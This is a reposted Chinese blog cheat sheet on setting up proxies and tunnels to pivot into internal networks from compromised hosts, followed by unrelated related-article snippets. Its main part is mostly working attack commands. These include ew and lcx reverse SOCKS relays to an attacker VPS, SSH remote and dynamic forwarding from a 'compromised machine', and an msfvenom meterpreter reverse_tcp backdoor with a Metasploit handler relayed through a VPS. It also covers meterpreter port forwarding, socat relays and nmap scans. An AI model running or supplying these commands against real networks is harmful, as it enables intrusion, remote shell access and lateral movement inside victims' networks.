内网代理配置

最新推荐文章于 2024-05-31 23:45:00 发布
最新推荐文章于 2024-05-31 23:45:00 发布
阅读量995 收藏 1
点赞数
原文链接:http://www.cnblogs.com/afanti/p/10331453.html
版权

1、ew

攻击者windows:192.168.20.112(外网)
服务器linux:192.168.61.141(内网)
攻击者运行,将8081端口流量转发到1081端口

C:\Users\Administrator\Desktop\ew\release>ew_win32.exe -s rcsocks -l 1081 -e 8081

服务器上运行下面命令,连接攻击者的8081端口

 ./ew_linux_x64 -s rssocks -d 192.168.20.112 -e 8081

成功建立连接。
Alt text
设置好代理
Alt text
这样打开应用。
Alt text
访问内网应用
Alt text

ew代替lcx实现端口转发
vps运行:./ew_linux_x64 -s lcx_listen -l 1080 -e 8889
内网机器:ew_win32.exe -s lcx_slave -d 68.183.180.185 -e 8889 -f 127.0.0.1 -g 80 // 68.183.180.185vps地址 。将内网80端口流量转发到vps的1080流量
1298490-20190410135200356-1958464285.png

参考链接:
https://xz.aliyun.com/t/260
https://bbs.ichunqiu.com/thread-36219-1-2.html
这个方法挺实用

2、reGeorg+proxifier

直接参考天哥文章,写的相当详细了。
这里注意下用设置好代理后扫描端口时用如下命令:

nmap -Pn -sT 192.168.60.128。

参考链接:
https://mp.weixin.qq.com/s/9ZjlkuoyT4Da-77_9Y7teg

3、ssh隧道代理转发

说明一下,下面a,b是端口转发 c是做soket代理。

a.本地转发

攻击机:192.168.61.142
肉鸡:178.128.216.86

远程管理服务器上的 mysql,mysql 不能直接 root 远程登陆。这时候就可以通过本地转发,通过 ssh 将服务器的 3306 端口转发到本地 1234 端口
直接连接远程服务器的mysql服务器,显示拒绝连接。当把端口转发出来在连接,连接本地1234端口-->相当于连接远程服务器的3306端口
Alt text
说明一下上面的操作是在192.168.61.142上操作,需要输入肉鸡的ssh密码

b.远程转发

这个功能经常使用,内网的攻击机kali系统,通过外网vps转发,弹shell到内网kali,通过vps转发
编辑如下配置:

#vi /etc/ssh/sshd_config
PermitRootLogin yes     允许root远程登陆,其实并不建议这样干
AllowTcpForwarding yes
GatewayPorts yes    
TCPKeepAlive yes    保持心跳,防止ssh断开
PasswordAuthentication yes
ServerAliveInterval=20
ServerAliveCountMax=8
# /etc/init.d/sshd restart

攻击机:178.128.216.86
肉鸡:192.168.61.142

以下操作是在192.168.61.142上
ssh -CfNg -R 81:127.0.0.1:80 root@178.128.216.86
将肉鸡的80端口转发到攻击机的8888端口上
Alt text
在攻击机上访问本地的8888端口相当于访问肉鸡的80端口
Alt text
远程转发缺点就在于因为是在肉鸡上操作,并且输入了攻击机的密码,如果肉鸡上有键盘记录,攻击机就遭殃了。
外网vps做跳板,内网kali渗透目标网段
内网ip:192.168.172.137(运行kali)
外网vps:68.183.180.185(当跳板)
拿到shell的机器:178.128.24.7
生成后门

 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=68.183.180.185 LPORT=4321 -f elf -o shell86

内网kali上:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.172.137
set lport 4321
run

内网kali上,开启转发(注意ip写192.168.172.137不要写127.0.0.1),把上面的ssh配置做了。

ssh -CfNg -R 4321:192.168.172.137:4321 root@68.183.180.185

拿到shell的机器运行shell86
内网kali拿到shell.
1298490-20190223154659847-1621987319.png

https://klionsec.github.io/2016/09/21/ssh-portforward/

c.ssh动态转发 socks 代理(最常用)

攻击机:192.168.61.142
肉鸡:178.128.216.86
肉鸡 是个国外的vps,在国内是访问不了google的。
在攻击机上输入ssh -qTfnN -D 1080 root@178.128.216.86
Alt text
设置好代理链:
Alt text
访问google(这里google相当于内网的服务)
Alt text
vps上有一张内网网卡
Alt text
访问内网中的服务。
Alt text
参考链接:
https://xz.aliyun.com/t/142/#toc-9
http://blog.creke.net/722.html
https://xz.aliyun.com/t/1862

4、 msf代理

下面这篇文章写得挺好,利用msf设置socket 4a代理,用永恒之蓝打内网
参考链接:
https://www.anquanke.com/post/id/86505
msf端口转发,当我们在浏览器中向本地2323端口发送一个链接请求时,该连接请求将会转发到IP地址为7.7.7.20的计算机的80端口

meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20

参考链接:
https://www.freebuf.com/articles/network/125278.html
https://klionsec.github.io/2016/09/25/msf-socks4a/

5、socat

socat功能跟nc差不多,比nc强大的点是类似于ssh的本地转发
Alt text
访问数据库
Alt text
下面第二个链接是一个脚本,安装socat并且后台转发端口流量
和上面命令一样:
请输入本地端口:8888
请输入远程端口:80
请输入远程IP:178.120.216.86
参考链接:
http://brieflyx.me/2015/linux-tools/socat-introduction/
https://www.cokemine.com/socat-one.html

6、其他

还有一种思路是在跳板机搭建vpn服务,将vpn服务的端口映射到防火墙外边来。这里面的细节不是太清楚,来年请教下蛋哥。

7、二级代理

这俩次代理都是通过,regeorg跳
1298490-20190319151716075-344824495.png
1298490-20190319151743281-1465450819.png
或者172.16.1.129这台机器加入没有web服务,可以通过开启socks5代理,代理到192.168.232.0网络
开启socks5服务器的可以用ew -s ssocksd -l 8889或者python reprocks_client.py -m 3 8889(reprocks工具挺好用的,工具在这里:https://github.com/RicterZ/reprocks)
1298490-20190319151948483-1634509394.png
1298490-20190319152002272-629579123.png
或者可以设置个代理链:
1298490-20190319152024381-1355016445.png
1298490-20190319152039273-963168941.png

最后说一下nmap常用扫描命令:

存活扫描:
 nmap -sP 192.168.0.0/24 
指定端口范围扫描:
 nmap -sT -Pn 192.168.0.1 -p(start)-(end)
全端口扫描:
 nmap -sT 192.168.0.1
UDP端口扫描:
nmap -sU 192.168.0.1
操作系统识别:
nmap -sS -O  192.168.0.1
[Nmap在VMware NAT网络下探测主机存活误报的分析](https://mp.weixin.qq.com/s/U9W_77Ao7YoO9-Y4Xgsh9g)  
nmap -sn -PE -n 192.168.0.0/24

内网渗透备忘录:
https://tom0li.github.io/%E5%86%85%E7%BD%91%E5%A4%87%E5%BF%98%E5%BD%95/
以上属于比较简单的代理设置,当你处于内网环境时,谁也不知道防火墙或者IDS检查什么流量,可以尝试udp隧道,dns隧道,http隧道,socket隧道,tcp隧道,socket4a,icmp隧道。
dns隧道搭建参考这篇:
http://www.4hou.com/technology/3143.html?spm=a2c4e.11153940.blogcont222429.9.15bc5305mjB3rK
icmp隧道参考这篇文章:
https://xz.aliyun.com/t/2379
最最后实力推荐这个博客,写的是巨好,有13篇:通向彼岸之xxxx都是关于代理的讲解:
https://klionsec.github.io

转载于:https://www.cnblogs.com/afanti/p/10331453.html

weixin_30702413
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代理网络配置
C_Linda的博客
02-26 817
代理网络连接 对连接右键打开“网络和internet设置”,进入后找到——以太网 点击上方的以太网标志 然后进行对应网络的IP设置填写 点击保存选项 然后选择代理进行代理服务器的配置: 之后要在微信等使用的时候也需要先进行代理服务器的连接,连接成功后使用代理服务器的网络。 之后就OK啦 ...
nginx外网访问内网站点配置操作
01-09
背景: 站点是前后端分离:vue+springboot 前端内网地址:192.168.1.10:81 API内网地址:192.168.1.12:8080 ...需求: 通过域名可以访问站点且站点静态资源且可访问API请求数据 ...补充知识:用nginx实现反向代理,实现外
RocketMQ集群搭建
shaoyangdd的专栏
03-11 596
准备三台虚拟机,如我的是CentOS7 , 三台机器的IP分别是: 192.168.20.132、192.168.20.131、192.168.20.130 3. 安装JDK 最好是Oracle官方的,不要用OpenJDK 配置/etc/profile,在文件后追加 使环境变量生效 检查是否安装成功 4. 安装RocketMQ 官网下载压缩包然后解压,然后配置环境变量,三台服务器都要。 5. 配置RocketMQ集群 服务
nginx docker 让局域网内的服务器访问互联网
qq_34168515的博客
11-11 1776
文章目录一、正向代理图结构图目标二、注意事项相关地址三、快速使用3.1 在可以访问网络的服务器,比如案例中的 192.168.1.203.2 在不可以联网的服务器,比如案例中的 192.168.1.10设置 http代理设置 https代理 一、正向代理图 结构图 主机 是否可以访问外网 安装 192.168.1.10 不可以 配置http_proxy和https_proxy,指向192.168.1.20 192.168.1.20 可以 安装nginx 目标 让局域网内无法访问外网
代理浅谈之内网渗透
最新发布
qq_46089119的博客
05-31 795
这时,通过设置端口转发或搭建代理服务器,如Socks代理,可以构建一个通道,使得攻击者能够穿透网络边界,进而横向移动到内网的其他主机。反向代理代理的是服务端,客户端发送请求到代理服务器,代理服务器将收集到的请求分发给后面的服务器,对应的服务器处理完将结果返回代理服务器,代理再将结果给到客户端。(此时真实的服务器是匿名的)正向代理:正向代理代理的是客户端,客户发送请求给到代理服务器,代理服务器代替客户把请求发送给服务器。SOCKS5代理:支持TCP,UDP,DNS,POP3,P2P共享等。
ip地址理解 192.168.19.255/20
软件工程小施同学 的专栏
10-12 4572
192.168.19.255是一个不可以用的地址,它是主播地址。 斜杠后面的数字是子网掩码个数,这里是20位的,即从前往后有20个1,改成2进制就是zhi11111111.11111111.11110000.00000000。 19写成2进制是00010011,掩码/20说明00010011前四位是网络位,所以这个网络地址应该是192.168.16.0/20 所以地址只要大于192.168.16.0 的都属于这个网段,所以192.168.19.255属于这个网段。 参考:https...
【Linux-Minio】安装部署文档(含单节点多盘、多节点多盘【TLS+Nginx负载均衡】、省市代码)
琴韵悠悠
11-27 1万+
【Linux-Minio】安装部署文档(含单节点多盘、多节点多盘【TLS+Nginx负载均衡】、省市代码)
nginx 反向代理微信服务器问题
09-08 1730
需求: 内网服务器 B 需要访问微信服务器,所以做反向代理 环境配置: 服务器 A 能访问外网 服务器 B 不能访问外网 解决办法: 修改服务器 B 的 hosts 文件,域名指向服务器 A A的IP地址 mp.weixin.qq.com 服务器 A 的 nginx 配置 server { listen 80; server_name mp.weixin.qq.com; location / { index index.html
Go-简单的反向代理用于内网穿透
08-14
通过在外网配置这样的代理,外部用户就可以通过8080端口访问到内网的服务器。 然而,实际的内网穿透可能涉及到更复杂的场景,比如动态端口分配、多个服务的穿透等。这时,我们可以自定义`director`函数来处理更复杂...
haproxy透明代理配置TPROXY1
08-04
【haproxy透明代理配置TPROXY1】 haproxy是一款强大的负载均衡器,它能够实现高可用性和高性能的网络流量分发。在本实验环境中,我们使用haproxy的TPROXY(Transparent Proxy)模式来实现透明代理,使得客户端在不...
使用Frps内网穿透记录
01-15
内网穿透技术是一种在内网环境下,通过特定的代理服务,使得内网设备可以被公网访问的技术。在本文中,我们将深入探讨“使用Frps内网穿透”的实践过程及其相关知识点。 Frps(Frp Server)是Frpc(Frp Client)的...
frp内网穿透客户端服务
11-20
frp基于反向代理的概念,分为客户端(Client)和服务器端(Server)。客户端部署在内网环境中,而服务器端部署在有公网IP的服务器上。当内网中的服务想要被外界访问时,客户端会与服务器端建立连接,将请求转发至...
内网渗透使用代理访问内网
hacker0ne的博客
12-16 8999
目录(?)[-]一 windows环境reGeorg与proxifier 1 搭建reGeorg运行环境python 2 安装reGeorg 3 使用reGeorg开启socks5反向代理服务 4 利用proxifier进行socks5代理 二 Linuxkali-linux环境reGeorg与proxychains 1 安装reGeorg
内网服务器通过CCproxy代理上网
热门推荐
IT人生
08-25 9万+
因为服务器连不了外网,安装东西的时候总要手动安装,特别麻烦,所以今天又get了一项新技能,Linux服务器通过代理服务器上网 一、下载CCproxy 链接:https://pan.baidu.com/s/1d1G4gSU2K0vCPJXEm1QZRA 密码:66bv 这是我的百度云里面的 二、安装CCproxy CCProxy安装教程   1、运行“CCProxy.exe”进行安装,根...
内网代理设置
weixin_30410999的博客
12-28 532
1. Eclipse 代理设置 window–>preferences–>general–>network connections 选中 manual proxy configuration: 依次填入http proxy , port就ok 了。 另外,如果代理需要用帐号和密码就需要选中 Enable proxy authentication, 然后填上 user ...
局域网服务器如何设置代理访问公网
y1006597541的博客
02-02 2万+
背景 首先有两台服务器AB,其中A有无外网,B有外网。A配置(内网IP172.19.58.202\系统CentOS7.4),B配置(内网IP172.19.58.201\系统CentOS7.4)。现在A服务器是无法访问外网的,需要使用代理的方法让A通过有外网的B访问外网。 该操作一共可以分为两个部分:一、配置A代理 二、在服务器B上安装代理程序。 配置A代理 该步骤比较简单,直接配置环境变量...
内网***之socks5代理(reGeorg+proxifier详细配置说明)
weixin_34176694的博客
07-28 1557
1. 首先我们需要明白正向代理和反向代理的区别1.1 正向代理(Forward Proxy)PythonLhost-->proxy-->RhostLhost-->proxy-->RhostLhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理...
webpack之proxyTable设置跨域
weixin_33751566的博客
05-03 634
为什么要使用proxyTable 很简单,两个字,跨域。 在平时项目的开发环境中,经常会遇到跨域的问题,尤其是使用vue-cli这种脚手架工具开发时,由于项目本身启动本地服务是需要占用一个端口的,所以必然会产生跨域的问题。当然跨域有多种解决方式,这里就不一一例举,下次弄篇文章单独讲,在使用webpack做构建工具的项目中使用proxyTable代理实现跨域是一种比较方便的选择。 如何使用pr...
内网穿透配置nginx
09-09
2. 配置nginx反向代理:在nginx的配置文件中,添加一个反向代理配置,将外部请求转发到内网服务器。在nginx配置文件(通常位于 `/etc/nginx/nginx.conf`)中添加以下内容: ```conf http { ... server { listen ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值